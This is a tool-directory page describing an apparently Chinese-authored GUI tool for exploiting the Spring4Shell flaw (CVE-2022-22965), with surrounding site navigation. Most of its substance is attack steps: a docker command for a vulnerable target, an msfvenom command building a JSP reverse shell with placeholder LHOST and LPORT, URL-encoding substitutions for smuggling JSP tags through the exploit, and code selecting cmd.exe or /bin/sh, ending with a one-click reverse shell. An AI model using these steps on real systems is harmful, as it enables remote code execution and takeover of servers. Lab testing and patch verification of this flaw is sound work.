Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Fast-CVE-2022-22965 — CVE-2022-22965图形化检测工具 | Kitploit
Tools/GitHubGitHub/iloveflag/fast-cve-2022-22965
Vulnerability ScannersPayload GenerationExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubiloveflag/fast-cve-2022-22965

Fast-CVE-2022-22965

CVE-2022-22965图形化检测工具

View Repository
43 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Target Machine

root@kitploit:~
docker run -itd -p 80:8080 vulfocus/spring-core-rce-2022-03-29:latest

Reverse shell essentially references msfvenom

root@kitploit:~
msfvenom -p java/jsp_shell_reverse_tcp LHOST=xxx LPORT=xxx -f raw -o shell.jsp

After URL encoding the JSP, use

root@kitploit:~
%3C%25 replaces %25%7Bc2%7Di representing <%
%25%3E replaces %25%7Bsuffix%7Di representing %>

In the code, the shellpath is modified based on different server types

root@kitploit:~
if self.radioButton_win.isChecked():
    shellpath = "cmd.exe"
if self.radioButton_linux.isChecked():
    shellpath = "/bin/sh"

Command execution: whoami detection: One-click reverse shell

Download Tool